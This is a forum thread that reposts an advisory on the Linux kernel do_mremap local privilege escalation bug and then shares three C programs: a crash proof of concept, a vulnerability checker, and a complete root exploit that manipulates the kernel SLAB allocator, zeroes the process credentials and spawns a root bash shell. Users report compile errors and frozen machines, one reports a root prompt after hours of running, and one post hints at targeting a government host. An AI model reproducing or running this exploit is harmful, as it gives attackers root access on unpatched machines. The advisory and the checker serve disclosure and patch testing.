Synopsis: Linux kernel do_mremap local privilege escalation vulnerability
Product: Linux kernel
Version: 2.2, 2.4 and 2.6 series

Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985
Author: Paul Starzetz <ihaquer@isec.pl>,
Wojciech Purczynski <cliph@isec.pl>
Date: January 5, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel
memory management code in mremap(2) system call due to incorrect bound
checks.


Details:
========

The mremap system call provides functionality of resizing (shrinking or
growing) as well as moving across process's addressable space of existing
virtual memory areas (VMAs) or any of its parts.

A typical VMA covers at least one memory page (which is exactly 4kB on
the i386 architecture). An incorrect bound check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory area
may lead to creation of a virtual memory area of 0 bytes length.

The problem bases on the general mremap flaw that remapping of 2 pages
from inside a VMA creates a memory hole of only one page in length but
an additional VMA of two pages. In the case of a zero sized remapping
request no VMA hole is created but an additional VMA descriptor of 0
bytes in length is created.

Such a malicious virtual memory area may disrupt the operation of other
parts of the kernel memory management subroutines finally leading to
unexpected behavior.

A typical process's memory layout showing invalid VMA created with
mremap system call:

08048000-0804c000 r-xp 00000000 03:05 959142 /tmp/test
0804c000-0804d000 rw-p 00003000 03:05 959142 /tmp/test
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40014000 r-xp 00000000 03:05 1544523 /lib/ld-2.3.2.so
40014000-40015000 rw-p 00013000 03:05 1544523 /lib/ld-2.3.2.so
40015000-40016000 rw-p 00000000 00:00 0
4002c000-40158000 r-xp 00000000 03:05 1544529 /lib/libc.so.6
40158000-4015d000 rw-p 0012b000 03:05 1544529 /lib/libc.so.6
4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

The broken VMA in the above example has been marked with a [*].


Impact:
=======

Since no special privileges are required to use the mremap(2) system
call any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of arbitrary code
with kernel level access. Proof-of-concept exploit code has been created
and successfully tested giving UID 0 shell on vulnerable systems.

The exploitability of the discovered vulnerability is possible, although
not a trivial one. We have identified at least two different attack
vectors for the 2.4 kernel series. All users are encouraged to patch all
vulnerable systems as soon as appropriate vendor patches are released.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research.


Disclaimer:
===========

This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.

http://www.security.nnov.ru/search/exploits.asp

/*
* Proof-of-concept exploit code for do_mremap()
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}

In file included from mremap.c:6:
/usr/include/sys/mman.h:44: parse error before `size_t'
/usr/include/sys/mman.h:58: parse error before `size_t'
/usr/include/sys/mman.h:63: parse error before `size_t'
/usr/include/sys/mman.h:68: parse error before `size_t'
/usr/include/sys/mman.h:73: parse error before `size_t'
/usr/include/sys/mman.h:78: parse error before `size_t'
/usr/include/sys/mman.h:81: parse error before `size_t'
/usr/include/sys/mman.h:96: parse error before `size_t'
In file included from mremap.c:7:
/usr/include/unistd.h:300: parse error before `size_t'
/usr/include/unistd.h:301: parse error before `size_t'
/usr/include/unistd.h:304: parse error before `size_t'
/usr/include/unistd.h:305: parse error before `size_t'
/usr/include/unistd.h:419: parse error before `size_t'
In file included from mremap.c:7:
/usr/include/unistd.h:510: parse error before `confstr'
/usr/include/unistd.h:510: parse error before `size_t'
/usr/include/unistd.h:510: warning: data definition has no type or storage class
/usr/include/unistd.h:664: parse error before `size_t'
/usr/include/unistd.h:687: parse error before `size_t'
In file included from mremap.c:7:
/usr/include/unistd.h:733: parse error before `size_t'
/usr/include/unistd.h:737: parse error before `size_t'
/usr/include/unistd.h:747: parse error before `size_t'
/usr/include/unistd.h:748: parse error before `size_t'
/usr/include/unistd.h:769: parse error before `size_t'
mremap.c:16: parse error before `size_t'
mremap.c: In function `real_mremap':
mremap.c:17: `old_address' undeclared (first use in this function)
mremap.c:17: (Each undeclared identifier is reported only once
mremap.c:17: for each function it appears in.)
mremap.c:17: `old_size' undeclared (first use in this function)
mremap.c:17: `new_size' undeclared (first use in this function)
mremap.c:17: `flags' undeclared (first use in this function)
mremap.c:17: `new_address' undeclared (first use in this function)

on an other box
"memoryaccesserror"
and my whole linux crash

hey.. it's a PoC
that doesn't mean it gives ya a shell!
it's just to show how it works
not to give ya uid0...
some PoC are full working but not this one

so let's w8 for a better source!

kthxbye

I think it's a local exploit so you need access to the vuln box

omg....
no it's remote of cuz....
DAMN!
IT'S (filtered) LOCAL!
read the advisorie...

sry mate, my bad.... should read those more carefully

just waiting for better proof-of-concept

http://www.k-otik.com/exploits/01.07.mremap_poc2.c.php

Linux Kernel "do_mremap" Local Proof of Concept II

/*
* Proof of concept code for testing do_mremap() Linux kernel bug.
* It is based on the code by Christophe Devine and Julien Tinnes
* posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since
* it avoids any kernel data corruption.
*
* The following test was done against the Linux kernel 2.6.0. Similar
* results were obtained against the kernel 2.4.23 and previous ones.
*
* buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
* buffer@mintaka:~$ ./mremap_bug
*
* Base address : 0x60000000
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
* 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
* 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
* 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
* 40016000-40017000 rw-p 00000000 00:00 0
* 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
* 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
* 40156000-40159000 rw-p 00000000 00:00 0
* 60000000-60002000 rw-p 00000000 00:00 0
* bfffd000-c0000000 rwxp ffffe000 00:00 0
*
* Remapping at 0x70000000...
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
* 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
* 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
* 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
* 40016000-40017000 rw-p 00000000 00:00 0
* 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
* 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
* 40156000-40159000 rw-p 00000000 00:00 0
* 60000000-60002000 rw-p 00000000 00:00 0
* 70000000-70000000 rw-p 00000000 00:00 0
* bfffd000-c0000000 rwxp ffffe000 00:00 0
*
* Report :
* This kernel appears to be VULNERABLE
*
* Segmentation fault
* buffer@mintaka:~$
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>

#define MREMAP_FIXED 2

#define PAGESIZE 4096
#define VMASIZE (2*PAGESIZE)
#define BUFSIZE 8192

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

#define MAPS_NO_CHECK 0
#define MAPS_CHECK 1

int mremap_check = 0;

void maps_check(char *buf)
{
if (strstr(buf, "70000000"))
mremap_check++;
}

void read_maps(int fd, char *path, unsigned long flag)
{
ssize_t nbytes;
char buf[BUFSIZE];

if (lseek(fd, 0, SEEK_SET) < 0) {
fprintf(stderr, "Unable to lseek %s\n", path);
return;
}

while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {

if (flag & MAPS_CHECK)
maps_check(buf);

if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
fprintf(stderr, "Unable to read %s\n", path);
exit (1);
}
}
}

int main(int argc, char **argv)
{
void *base;
char path[16];
pid_t pid;
int fd;

pid = getpid();
sprintf(path, "/proc/%d/maps", pid);

if ( !(fd = open(path, O_RDONLY))) {
fprintf(stderr, "Unable to open %s\n", path);
return 1;
}

base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);

printf("\nBase address : 0x%x\n\n", base);
read_maps(fd, path, MAPS_NO_CHECK);

printf("\nRemapping at 0x70000000...\n\n");
base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *)0x70000000);

read_maps(fd, path, MAPS_CHECK);

printf("\nReport : \n");
(mremap_check)
? printf("This kernel appears to be VULNERABLE\n\n")
: printf("This kernel appears to be NOT VULNERABLE\n\n");

close(fd);
return 0;
}

seems to work fine, now lets hope there will be a better local root exploit with shell code ;P

Linux dhcp01-office.whitehouse.gov ??

http://www.k-otik.com/exploits/01.15.kernelmremap.c.php

/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz <paul isec pl>
*
* Copyright © 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define str(s) #s
#define xstr(s) str(s)

#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000

#define RNDINT 512

#define NUMVMA (3 * 5 * 257)
#define NUMFORK (17 * 65537)

#define DUPTO 1000
#define TMPLEN 256

#define __NR_sys_mremap 163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long
new_len,
unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid,
gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
printf("\n");
if (!errno) {
fprintf(stderr, "FATAL: %s\n", msg);
} else {
perror(msg);
}

printf("\nentering endless loop");
fflush(stdout);
fflush(stderr);
while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
int i, c;
int *v;

if (!file)
goto out;

__asm__("movl %%esp, %0" : : "m" ©);

c &= 0xffffe000;
v = (void *) c;

for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
if (v[i] == uid && v[i+1] == uid) {
i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
}
if (v[i] == gid) {
v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
break;
}
}
out:
dummy++;
}

void try_to_exploit(void)
{
int v = 0;

v += fops[0];
v += fake_file[0];

kernel_code(0, 0, v);
lseek(DUPTO, 0, SEEK_SET);

if (geteuid()) {
printf("\nFAILED uid!=0"); fflush(stdout);
errno =- ENOSYS;
fatal("uid change");
}

printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

kill(ppid, SIGUSR1);
setresuid(0, 0, 0);
sleep(1);

printf("\n\n"); fflush(stdout);

execl("/bin/bash", "bash", NULL);
fatal("burp");
}

void cleanup(int v)
{
victim[DUPTO] = victim[0];
kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
printf("\n[!] parent check race... "); fflush(stdout);

if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
printf("SUCCESS, cought SLAB page!"); fflush(stdout);
victim[DUPTO] = (unsigned) & fake_file;
signal(SIGUSR1, &cleanup);
kill(pid, SIGUSR1);
} else {
printf("FAILED!");
}
fflush(stdout);
}

int get_slab_objs(void)
{
FILE * fp;
int c, d, u = 0, a = 0;
static char line[TMPLEN], name[TMPLEN];

fp = fopen("/proc/slabinfo", "r");
if (!fp)
fatal("fopen");

fgets(name, sizeof(name) - 1, fp);
do {
c = u = a =- 1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
} while (strcmp(name, "size-4096"));

fclose(fp);

return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
int n, c = 1;

*victim = 0;
printf("\n[+] parent unprotected PTE "); fflush(stdout);

dup2(0, 2);
while (1) {
n = get_slab_objs();
if (n < 0)
fatal("read slabinfo");
if (n > 0) {
printf("\n depopulate SLAB #%d", c++);
blah = 0; kill(hpid, SIGUSR1);
while (!blah) pause();
}
if (!n) {
blah = 0; kill(hpid, SIGUSR1);
while (!blah) pause();
dup2(0, DUPTO);
break;
}
}

signal(SIGUSR1, &redirect_filp);
kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
int i = NUMVMA;

while (1) {
tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
fatal("unmap1");
}
i--;
if (!i)
break;

tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
fatal("unmap2");
}
i--;
if (!i)
break;
}
}

void catchme(int v)
{
blah++;
}

void exitme(int v)
{
_exit(0);
}

void childrip(int v)
{
waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
signal(SIGUSR1, &catchme);
signal(SIGUSR2, &exitme);
blah = 0;

while (1) {
while (!blah) pause();

blah = 0;
if (!fork()) {
dup2(0, DUPTO);
kill(getppid(), SIGUSR1);
while (1) pause();
} else {
while (!blah) pause();
blah = 0; kill(ppid, SIGUSR2);
}
}
exit(0);
}

int main(void)
{
int i, r, v, cnt;
time_t start;

srand(time(NULL) + getpid());
ppid = getpid();
uid = getuid();
gid = getgid();

hpid = fork();
if (!hpid)
slab_helper();

fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (fops == MAP_FAILED)
fatal("mmap fops VMA");
for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
fops[i] = (unsigned)&kernel_code;
for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
fake_file[i] = (unsigned)fops;

vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (vma_ro == MAP_FAILED)
fatal("mmap1");

vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (vma_rw == MAP_FAILED)
fatal("mmap2");

cnt = NUMVMA;
while (1) {
r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
if (r == (-1)) {
printf("\n[-] ERROR remapping"); fflush(stdout);
fatal("remap1");
}
cnt--;
if (!cnt) break;

r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
if (r == (-1)) {
printf("\n[-] ERROR remapping"); fflush(stdout);
fatal("remap2");
}
cnt--;
if (!cnt) break;
}

victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (victim != (void *) PAGEADDR)
fatal("mmap victim VMA");

v = *victim;
*victim = v + 1;

signal(SIGUSR1, &unprotect);
signal(SIGUSR2, &catchme);
signal(SIGCHLD, &childrip);
printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
start = time(NULL);

cnt = NUMFORK;
v = 0;
while (1) {
cnt--;
v--;
dummy += *victim;

if (cnt > 1) {
__asm__(
"pusha \n"
"movl %1, %%eax \n"
"movl $("xstr(CLONEFL)"), %%ebx \n"
"movl %%esp, %%ecx \n"
"movl $120, %%eax \n"
"int $0x80 \n"
"movl %%eax, %0 \n"
"popa \n"
: : "m" (pid), "m" (dummy)
);
} else {
pid = fork();
}

if (pid) {
if (v <= 0 && cnt > 0) {
float eta, tm;
v = rand() % RNDINT / 2 + RNDINT / 2;
tm = eta = (float)(time(NULL) - start);
eta *= (float)NUMFORK;
eta /= (float)(NUMFORK - cnt);
printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ",
NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
fflush(stdout);
}
if (cnt) {
waitpid(pid, 0, 0);
continue;
}
if (!cnt) {
while (1) {
r = wait(NULL);
if (r == pid) {
cleanup_vmas();
while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
}
}
}
}

else {
cleanup_vmas();

if (cnt > 0) {
_exit(0);
}

printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
sleep(1);

signal(SIGUSR1, &catchme);
munmap(0, PAGE_SIZE);
dup2(0, 2);
blah = 0; kill(ppid, SIGUSR1);
while (!blah) pause();

munmap((void *)victim, PAGE_SIZE);
dup2(0, DUPTO);

blah = 0; kill(ppid, SIGUSR1);
while (!blah) pause();
try_to_exploit();
while (1) pause();
}
}
return 0;
}

i've been wondering how soon an exploit for that would come out. time to test it on my systems

I have Linux-2.4.23+Grsec and when I try exploit by isec.pl then whole machine is freez.

I like it... can't wait to hear more on how successful these are for you guys.

i'm trying it out on my own system right now (running 2.4.21 kernel) and i have top going on another screen and the CPU usage seems to be staying around 22-23%. my box hasn't frozen yet though *fingers crossed*

i'll post when i have results to share

btw, the exploit has an ETA displayed of 24300 seconds (over 6.5 hours) so this could be a while

well, it worked after about 6 hours and 45 minutes it gave me a root prompt. nice exploit ......wish it didn't take so long though. i'll have to do some reading on it and figure out why it needs to much time.